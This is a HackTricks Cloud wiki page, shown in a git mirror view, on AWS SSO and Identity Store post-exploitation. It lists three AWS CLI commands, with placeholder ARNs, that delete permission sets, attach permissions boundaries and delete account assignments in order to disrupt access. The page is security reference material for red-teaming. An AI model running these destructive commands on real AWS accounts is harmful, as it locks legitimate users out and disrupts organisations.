gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-09 11:44:59 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
735f1f5b66d0cb3e0331676ea2cc2a2a469972f2
hacktricks-cloud/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
Carlos Polop 5ef56bb6b3 Recreating repository history for branch master
2024-12-12 19:35:48 +01:00

3.3 KiB
Raw Blame History

AWS - SSO & identitystore Post Exploitation

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

SSO & identitystore

For more information check:

{% content-ref url="../aws-services/aws-iam-enum.md" %} aws-iam-enum.md {% endcontent-ref %}

sso:DeletePermissionSet | sso:PutPermissionsBoundaryToPermissionSet | sso:DeleteAccountAssignment

These permissions can be used to disrupt permissions:

{% code overflow="wrap" %}

aws sso-admin delete-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --permissions-boundary-policy-arn <PolicyARN>

aws sso-admin delete-account-assignment --instance-arn <SSOInstanceARN> --target-id <TargetID> --target-type <TargetType> --permission-set-arn <PermissionSetARN> --principal-type <PrincipalType> --principal-id <PrincipalID>

{% endcode %}

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}
Reference in New Issue View Git Blame Copy Permalink